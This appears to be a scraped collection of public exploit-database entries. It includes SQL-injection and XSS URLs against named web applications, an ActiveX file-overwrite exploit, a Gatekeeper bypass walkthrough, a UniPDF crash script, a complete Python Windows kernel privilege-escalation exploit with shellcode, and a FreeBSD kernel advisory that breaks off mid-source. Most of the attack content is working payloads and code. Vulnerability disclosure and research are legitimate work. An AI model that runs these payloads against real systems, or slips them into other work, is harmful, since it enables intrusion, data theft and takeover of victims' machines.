HireHackking

source: https://www.securityfocus.com/bid/48561/info eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/npages/back.asp?id=[SQL]

source: https://www.securityfocus.com/bid/48564/info Classified Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/

source: https://www.securityfocus.com/bid/48582/info Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected. <html> <object classid=&#039;clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E&#039; id=&#039;target&#039; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &#039;vbscript&#039;> Sub Boom() arg1="FilePath\File_name_to_rewrite_or_create" arg2=1 arg3="New_File_Content" target.Text=arg3 target.SelStart=0 target.SelEnd=Len(arg3) target.SaveToFIle arg1,arg2 End Sub </script> </html>

source: https://www.securityfocus.com/bid/48621/info The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1

source: https://www.securityfocus.com/bid/48637/info Prontus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/prontus_fonasa/antialone.html?page=javascript:alert%28/XSS/%29;// http://www.example.com/prontus_senado/antialone.html?page=javascript:alert%28/XSS/%29;// http://www.example.com/p1_rector/antialone.html?page=javascript:alert%28/XSS/%29;//

source: https://www.securityfocus.com/bid/48639/info ICMusic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ICMusic 1.2 is vulnerable; other versions may also be affected. http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--

################################################################################################ # # # ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... # # ############################################################################################# Sobhan System Network & Security Group (sobhansys) ------------------------------------------------------- # Date: 2015-01-28 # Exploit Author: AmirHadi Yazdani (Sobhansys Co) # Vendor Homepage: http://www.manageengine.com/products/firewall/ # Demo Link: http://demo.fwanalyzer.com/ #Affected version: <= Build Version : 8.0 About ManageEngine Firewall Analyzer (From Vendor Site) : ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect, archive, analyze their security device logs and generate forensic reports out of it. -------------------------------------------------------- I'M hadihadi From Virangar Security Team special tnx to:MR.nosrati,black.shadowes,MR.hesy & all virangar members & all hackerz greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei spl:Z.Khodaee ------- exploit: Diretory Traversal : http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f XSS : http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d" ---- Sobhan system Co. Signal Network And Security Group (www.signal-net.net) E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net

# Exploit Title: OS X Gatekeeper bypass Vulnerability # Date: 01-27-2015 # Exploit Author: Amplia Security Research # Vendor Homepage: www.apple.com # Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite # Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite # CVE : CVE-2014-8826 Advisory URL : http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html Gatekeeper is a feature available in OS X Lion v10.7.5 and later versions of OS X. Gatekeeper performs checks on files and applications downloaded from the Internet to prevent execution of supposedly malicious and untrusted/unsigned code. Gatekeeper provides three different settings: - Mac App Store (Only apps that came from the Mac App Store can open) - Mac App Store and identified developers (Only apps that came from the Mac App Store and identified developers using Gatekeeper can open) - Anywhere The default setting is "Mac App Store and identified developers". This setting prevents execution of any code that was not downloaded from the Mac App Store and that was not digitally signed by a Developer ID registered with Apple. For example, If the user downloads an application from an untrusted source and double-clicks on the application to execute it, OS X Gatekeeper will prevent its execution with the following warning message: "<AppName> can't be opened because it is from an unidentified developer." (For more information on OS X Gatekeeper, see http://support.apple.com/kb/ht5290) We found an attacker can bypass OS X Gatekeeper protections and execute unsigned malicious code downloaded by the user, even if OS X Gatekeeper is configured to only allow execution of applications downloaded from the Mac App Store (the highest security setting). The exploitation technique is trivial and requires Java to be installed on the victim's machine. OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and class (.class) files, but this verification can be bypassed. For example: - Create a JAR file containing the code to be executed For example, File AmpliaTest.java: public class AmpliaTest { public static void main(String[] args) { try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY"); } catch(Exception e) { } } } (This is just an example, of course, arbitrary code can be executed) $ javac AmpliaTest.java Be sure to compile the code for a version of Java lower than or equal to the one available on the target (for example, javac -target 1.6 -source 1.6 AmpliaTest.java; and the compiled code will work on Java versions >= 1.6) . $ echo "main-class: AmpliaTest" > Manifest $ jar cmf Manifest UnsignedCode.jar AmpliaTest.class - Create a .DMG disk image For example: $ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg - Mount AmpliaTest.dmg - Rename UnsignedCode.jar to UnsignedCode (just remove the extension) - Copy UnsignedCode to the AmpliaSecurity volume - Unmount AmpliaTest.dmg - Host the file AmpliaTest.dmg on a web server - Download AmpliaTest.dmg using Safari and open it - Double-Click on 'UnsignedCode' and the code will be executed bypassing OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY). (Perform the same steps but without removing the .jar extension to UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file) Because the file 'UnsignedCode' has no extension, Finder will display a blank page icon; the Java/JAR icon will not be displayed. The user does not know he is double-clicking on a JAR file and the file does not look particularly suspicious. Also, since the unsigned code is distributed inside a disk image (.DMG) file, there are many things the attacker can do to gain the trust of the user (include other files, use Finder background images, etc).

# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC # Google Dork: [none] # Date: 01/28/2015 # Exploit Author: bonze # Email: dungvtr@gmail.com # Vendor Homepage: http://unipdf.com/ # Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download) # Version: 1.1 # Tested on: Windows 7 SP1 EN # CVE : [none] # Note: # Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking # Please tell me if you have any ideal #013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.) #013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; | #013E801E |. 51 PUSH ECX ; |WideCharBuf #013E801F |. 52 PUSH EDX ; |StringSize #013E8020 |. 50 PUSH EAX ; |StringToMap #013E8021 |. 6A 00 PUSH 0 ; |Options #013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP #013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar #013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208] # At Offset: 327-> overwrite nSEH # At Offset: 329-> overwrite SEH # badchar = 0x22 buff2 = "A" * 325 buff2+= "CC" # nSEH buff2+= "BB" # SEH crash2 = "<config>\n" crash2 += " <current Dat=\"1422420474\" />\n" crash2 += " <Dat Txt=\""+buff2+"\" />\n" crash2 += "</config>\n" # Copy file update.xml to UniPDF Application Folder and run UniPDF.exe file = open("update.xml","w") file.write(crash2) file.close() print "UniPDF v1.1 Crash PoC by bonze at FPT-IS" print "Email: dungvtr@gmail.com" print "File Created"

""" KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date: 2015.01.28 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: TCP/IP Protocol Driver Affected Version: 5.2.3790.4573 Platform: Microsoft Windows Server 2003 Service Pack 2 Architecture: x86, x64, Itanium Impact: Privilege Escalation Attack vector: IOCTL CVE-ID: CVE-2014-4076 2. Vulnerability Description The tcpip.sys driver fails to sufficiently validate memory objects used during the processing of a user-provided IOCTL. 3. Technical Description By crafting an input buffer that will be passed to the Tcp device through the NtDeviceIoControlFile() function, it is possible to trigger a vulnerability that would allow an attacker to elevate privileges. This vulnerability was discovered while fuzzing the tcpip.sys driver. A collection of IOCTLs that could be targeted was obtained and subsequently fuzzed. During this process, one of the crashes obtained originated from the IOCTL 0x00120028. This was performed on an x86 installation of Windows Server 2003, Service Pack 2. ErrCode = 00000000 eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270 eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 tcpip!SetAddrOptions+0x1d: f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=???????? A second chance exception has occurred during a mov instruction. This instruction is attempting to copy a pointer value from an un-allocated address space. Since no pointer can be found, an exception is generated. Let's begin by reviewing the call stack: kd> kv *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo]) f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo]) f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo]) f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo]) f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo]) f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo]) f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo]) f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo]) f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo]) The nt!NtDeviceIoControlFile() function was called, creating a chain of subsequent function calls that eventually led to the tcpip!SetAddrOptions() function being called. By de-constructing the call to nt!NtDeviceIoControlFile() we can derive all required information to re-create this exception. 0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 nt!NtDeviceIoControlFile+0x2a: 808e912e 5d pop ebp kd> db [ebp+2C] L?0x4 b940dd60 00 00 00 00 .... kd> db [ebp+28] L?0x4 b940dd5c 00 00 00 00 .... kd> db [ebp+24] L?0x4 b940dd58 20 00 00 00 ... kd> db [ebp+20] L?0x4 b940dd54 00 11 00 00 .... kd> db [ebp+1c] L?0x4 b940dd50 28 00 12 00 (... kd> db [ebp+18] L?0x4 b940dd4c 58 4f bd 00 XO.. kd> db [ebp+14] L?0x4 b940dd48 00 00 00 00 .... kd> db [ebp+10] L?0x4 b940dd44 00 00 00 00 .... kd> db [ebp+0c] L?0x4 b940dd40 00 00 00 00 .... kd> db [ebp+8] L?0x4 b940dd3c b8 06 00 00 .... The inputBuffer for this call references memory at 0x1000 with a length of 0x20. kd> db 0x1100 L?0x20 00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................ 00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "............... After review of the tcpip.sys driver, some memory trickery was created to control the code flow until the instruction pointer could be controlled in a way that would be beneficial to an attacker. kd> db 0x28 L?0x11 00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............ 00000038 01 eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 0000002a ff ??? Since the instruction pointer now contains 0x0000002a, exploitation becomes trivial. Merely allocating the desired payload for execution at this memory address will allow for unprivileged users to run their payload within a privileged process. 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability, the details of which are presented in the vendor's public acknowledgment MS14-070 (https://technet.microsoft.com/library/security/MS14-070). 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft requests PoC. 2014.04.29 - KoreLogic resends PoC from the initial contact email. 2014.04.29 - Microsoft acknowledges receipt of vulnerability report. 2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to investigate the vulnerability. 2014.04.30 - Microsoft informs KoreLogic that the case is actively being investigated. 2014.05.30 - Microsoft informs KoreLogic that the case is actively being investigated. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgment of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - KoreLogic informs Microsoft that no response was received following the 06.11.14 email. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - Microsoft replies to KoreLogic that they have reproduced the vulnerability and are determining how to proceed with the supplied information. They are not able to provide a CVE or an expected disclosure date. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.17 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.08.18 - Microsoft notifies KoreLogic that they have a CVE but are not willing to share it with KoreLogic at this time. 2014.09.08 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.09.11 - Microsoft responds saying that the vulnerability is expected to be disclosed in "a Fall release" and that "it is currently looking good for October." Does not provide CVE. 2014.09.24 - Microsoft informs KoreLogic that there was a packaging issue and that the patch will be pushed to November. 2014.11.03 - Microsoft confirms the patch will ship in November. 2014.11.11 - Vulnerability publicly disclosed by Microsoft as issue MS14-070 with CVE-2014-4076. 2015.01.28 - KoreLogic releases advisory. 7. Exploit """ #!/usr/bin/python2 # # KL-001-2015-001 / MS14-070 / CVE-2014-4076 # Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation # Matt Bergin @ KoreLogic / Level @ Smash the Stack # shout out to bla # from optparse import OptionParser from subprocess import Popen from os.path import exists from struct import pack from time import sleep from ctypes import * from sys import exit CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory = windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 def spawn_process(path): process = Popen([path],shell=True) pid = process.pid return def main(): print "CVE-2014-4076 x86 exploit, Level\n" global pid, process parser = OptionParser() parser.add_option("--path",dest="path",help="path of process to start and elevate") parser.add_option("--pid",dest="pid",help="pid of running process to elevate") o,a = parser.parse_args() if (o.path == None and o.pid == None): print "[!] no path or pid set" exit(1) else: if (o.path != None): if (exists(o.path) != True): print "[!] path does not exist" exit(1) else: Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start() if (o.pid != None): try: pid = int(o.pid) except: print "[!] could not convert PID to an interger." exit(1) while True: if ("pid" not in globals()): sleep(1) else: print "[+] caught attacker cmd at %s, elevating now" % (pid) break buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00" sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid)) sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba") sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00") handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[!] could not open handle into the Tcp device" exit(1) print "[+] allocating memory" ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40) if (ret_one != 0): print "[!] could not allocate memory..." exit(1) print "[+] writing relevant memory..." ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0))) ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0))) ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0))) ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0))) ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0))) print "[+] attack setup done, crane kick!" DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0) CloseHandle(handle) exit(0) if __name__=="__main__": main() """ The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt """

Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ FreeBSD Kernel Multiple Vulnerabilities 1. *Advisory Information* Title: FreeBSD Kernel Multiple Vulnerabilities Advisory ID: CORE-2015-0003 Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-multiple-vulnerabilities Date published: 2015-01-27 Date of last update: 2015-01-27 Vendors contacted: FreeBSD Release mode: Coordinated release 2. *Vulnerability Information* Class: Unsigned to Signed Conversion Error [CWE-196], Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129] Impact: Code execution, Denial of service Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2014-0998, CVE-2014-8612, CVE-2014-8612 3. *Vulnerability Description* FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices. Multiple vulnerabilities have been found in the FreeBSD kernel code that implements the vt console driver (previously known as Newcons) and the code that implements SCTP sockets. These vulnerabilities could allow local unprivileged attackers to disclose kernel memory containing sensitive information, crash the system, and execute arbitrary code with superuser privileges. 4. *Vulnerable packages* . FreeBSD 10.1-RELEASE. Other versions may be affected too but they were no checked. 5. *Non-vulnerable packages* . FreeBSD 10.1-RELENG. 6. *Vendor Information, Solutions and Workarounds* The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.1-RELENG or one of the following releases: . stable/10, 10.1-STABLE . releng/10.1, 10.1-RELEASE-p5 . releng/10.0, 10.0-RELEASE-p17 . stable/9, 9.3-STABLE . releng/9.3, 9.3-RELEASE-p9 . stable/8, 8.4-STABLE . releng/8.4, 8.4-RELEASE-p23 The vendor publish a security Advisory that can be accessed here[6]. 7. *Credits* This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability* [CVE-2014-0998] FreeBSD 10.1-RELEASE added[1] the 'vt(4)'[2] console driver (previously known as Newcons[3]). This new console driver can be enabled by adding the line 'kern.vty=vt' to the '/boot/loader.conf' file and then rebooting the system. The vt console driver is prone to a sign conversion error when handling the 'VT_WAITACTIVE' ioctl message, which can be ultimately leveraged by a local unprivileged attacker to make the kernel access an array outside of its boundaries. The vt console driver provides multiple virtual terminals, which are mapped to the '/dev/ttyv*' device nodes. A user can send messages to the vt driver by opening the '/dev/ttyv*' device node belonging to his virtual terminal and then using the 'ioctl' system call. The function 'vtterm_ioctl' in 'sys/dev/vt/vt_core.c' handles ioctl messages sent to the vt driver. One of the supported messages is called 'VT_WAITACTIVE': /----- static int vtterm_ioctl(struct terminal *tm, u_long cmd, caddr_t data, struct thread *td) { int error, i, s; [...] switch (cmd) { [...] case VT_WAITACTIVE: error = 0; i = *(unsigned int *)data; if (i > VT_MAXWINDOWS) return (EINVAL); if (i != 0) vw = vd->vd_windows[i - 1]; [...] -----/ As shown above, when handling the 'VT_WAITACTIVE' ioctl message, the 'data' input buffer (which is fully controlled by the local user) is casted as '(unsigned int *)' in order to read an 'unsigned int' from the input data; however, the read value is stored in the 'i' variable, which has *signed* type 'int'. This sign conversion error will make possible for a local attacker to bypass the subsequent boundary check that tries to ensure that 'i' is not greater than 'VT_MAXWINDOWS' before using it as an index to access the 'vd->vd_windows' array. This flaw can be leveraged by a local attacker to make the kernel access the 'vd->vd_windows' array outside of its boundaries. The following disassembly snippet represents the vulnerable code in the FreeBSD kernel binary ('/boot/kernel/kernel'): /----- vtterm_ioctl+1306 loc_C09B2506: ; CODE XREF: vtterm_ioctl+D6Cj vtterm_ioctl+1306 cmp esi, 20047606h ; case VT_WAITACTIVE: vtterm_ioctl+130C mov ecx, edx ; ecx = vd->vd_windows vtterm_ioctl+130E mov eax, ebx vtterm_ioctl+1310 jnz loc_C09B275B vtterm_ioctl+1316 mov eax, [eax] ; i = *(unsigned int *)data; vtterm_ioctl+1318 cmp eax, 0Ch ; if (i > VT_MAXWINDOWS)... vtterm_ioctl+131B mov edi, 16h vtterm_ioctl+1320 jg loc_C09B2760 ; *** signed comparison! vtterm_ioctl+1326 test eax, eax ; if (i != 0)... vtterm_ioctl+1328 jz short loc_C09B2531 vtterm_ioctl+132A mov eax, [ecx+eax*4-4] ; **** vw = vd->vd_windows[i - 1]; ---> access vd->vd_windows outside of its boundaries vtterm_ioctl+132E mov [ebp+var_30], eax -----/ 8.2. *FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability* [CVE-2014-8612] FreeBSD implements the Stream Control Transmission Protocol (SCTP).[4]. A userland application can use the 'getsockopt/setsockopt' system calls in order to manipulate the options associated with an SCTP socket. The FreeBSD kernel is prone to a memory corruption vulnerability when setting the 'SCTP_SS_VALUE' SCTP socket option via the 'setsockopt' system call. This vulnerability can be leveraged by a local unprivileged attacker to corrupt kernel memory with an arbitrary 16-bit value. The handling of the 'setsockopt' system call at the SCTP level is performed by the function 'sctp_setopt' [file 'sys/netinet/sctp_userreq.c']: /----- static int sctp_setopt(struct socket *so, int optname, void *optval, size_t optsize, void *p) { [...] switch (optname) { [...] case SCTP_SS_VALUE: { struct sctp_stream_value *av; SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, optsize); SCTP_FIND_STCB(inp, stcb, av->assoc_id); if (stcb) { if (stcb->asoc.ss_functions.sctp_ss_set_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id], av->stream_value) < 0) { -----/ As shown above, when handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local user), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), then the 'stcb->asoc.ss_functions.sctp_ss_set_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array. However, note that the memory address calculated using the untrusted index is not dereferenced yet; just the calculated address is passed as an argument to the function, so there is still no memory access at this point. 'stcb->asoc.ss_functions' has type 'struct sctp_ss_functions', which is a struct defined in the file 'sys/netinet/sctp_structs.h' containing several function pointers. One of its members is 'sctp_ss_set_value', which is the one being called when handling the 'SCTP_SS_VALUE' socket option: /----- /* * RS - Structure to hold function pointers to the functions responsible * for stream scheduling. */ struct sctp_ss_functions { void (*sctp_ss_init) (struct sctp_tcb *stcb, struct sctp_association *asoc, int holds_lock); void (*sctp_ss_clear) (struct sctp_tcb *stcb, struct sctp_association *asoc, int clear_values, int holds_lock); void (*sctp_ss_init_stream) (struct sctp_stream_out *strq, struct sctp_stream_out *with_strq); void (*sctp_ss_add_to_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc, struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock); int (*sctp_ss_is_empty) (struct sctp_tcb *stcb, struct sctp_association *asoc); void (*sctp_ss_remove_from_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc, struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock); struct sctp_stream_out *(*sctp_ss_select_stream) (struct sctp_tcb *stcb, struct sctp_nets *net, struct sctp_association *asoc); void (*sctp_ss_scheduled) (struct sctp_tcb *stcb, struct sctp_nets *net, struct sctp_association *asoc, struct sctp_stream_out *strq, int moved_how_much); void (*sctp_ss_packet_done) (struct sctp_tcb *stcb, struct sctp_nets *net, struct sctp_association *asoc); int (*sctp_ss_get_value) (struct sctp_tcb *stcb, struct sctp_association *asoc, struct sctp_stream_out *strq, uint16_t * value); int (*sctp_ss_set_value) (struct sctp_tcb *stcb, struct sctp_association *asoc, struct sctp_stream_out *strq, uint16_t value); }; -----/ The file 'sys/netinet/sctp_ss_functions.c' defines an array called 'sctp_ss_functions'; each element of this array has type 'struct sctp_ss_functions' and defines a set of function pointers suitable for different SCTP socket options: /----- struct sctp_ss_functions sctp_ss_functions[] = { /* SCTP_SS_DEFAULT */ { .sctp_ss_init = sctp_ss_default_init, .sctp_ss_clear = sctp_ss_default_clear, .sctp_ss_init_stream = sctp_ss_default_init_stream, .sctp_ss_add_to_stream = sctp_ss_default_add, .sctp_ss_is_empty = sctp_ss_default_is_empty, .sctp_ss_remove_from_stream = sctp_ss_default_remove, .sctp_ss_select_stream = sctp_ss_default_select, .sctp_ss_scheduled = sctp_ss_default_scheduled, .sctp_ss_packet_done = sctp_ss_default_packet_done, .sctp_ss_get_value = sctp_ss_default_get_value, .sctp_ss_set_value = sctp_ss_default_set_value }, /* SCTP_SS_ROUND_ROBIN */ { .sctp_ss_init = sctp_ss_default_init, .sctp_ss_clear = sctp_ss_default_clear, .sctp_ss_init_stream = sctp_ss_default_init_stream, .sctp_ss_add_to_stream = sctp_ss_rr_add, .sctp_ss_is_empty = sctp_ss_default_is_empty, .sctp_ss_remove_from_stream = sctp_ss_default_remove, .sctp_ss_select_stream = sctp_ss_default_select, .sctp_ss_scheduled = sctp_ss_default_scheduled, .sctp_ss_packet_done = sctp_ss_default_packet_done, .sctp_ss_get_value = sctp_ss_default_get_value, .sctp_ss_set_value = sctp_ss_default_set_value }, /* SCTP_SS_ROUND_ROBIN_PACKET */ { .sctp_ss_init = sctp_ss_default_init, .sctp_ss_clear = sctp_ss_default_clear, .sctp_ss_init_stream = sctp_ss_default_init_stream, .sctp_ss_add_to_stream = sctp_ss_rr_add, .sctp_ss_is_empty = sctp_ss_default_is_empty, .sctp_ss_remove_from_stream = sctp_ss_default_remove, .sctp_ss_select_stream = 